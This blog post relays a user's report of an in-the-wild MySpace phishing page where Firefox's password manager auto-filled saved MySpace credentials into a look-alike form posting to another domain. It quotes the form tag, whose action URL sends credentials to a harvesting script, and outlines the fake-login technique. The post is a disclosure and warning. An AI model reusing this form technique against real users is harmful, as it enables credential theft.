Firefox Password Storage Bug

Cross-Site Forms + Password Manager = Security Failure

A firefox user reported the following:

I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manager!

The underlying method was so obvious that it should have raised multiple warnings. There were none at all.

It was in a MySpace profile that included this tag:

.. form name=”2″ action=”http://membres.lycos.fr/adel88duran/plaguedoctor.php” method=”post”…

What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.

Not only did FireFox fail to raise a warning, it auto-filled my http://www.myspace.com username and password into this form!! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website.

I even confirmed in the password manager that I do not have any passwords saved for the membres.lycos.fr domain.

I realize there is a consideration for cross-site functionality on certain subdomains. However, I must say I am shocked that FireFox lacks a warning for both the POST element and the Password Manager in this case.

I would have been thoroughly fooled by this page were it not for a tiny formatting error that the phisher overlooked, and could have been easily fixed. An unsuspecting user would only have to click the Login button on this legitimate-looking page for the phish to be complete.

This appears to be a huge problem! I look forward to your response.

Read about it at Bugzilla

and delete your firefox passwords if you have been storing them.

Advertisements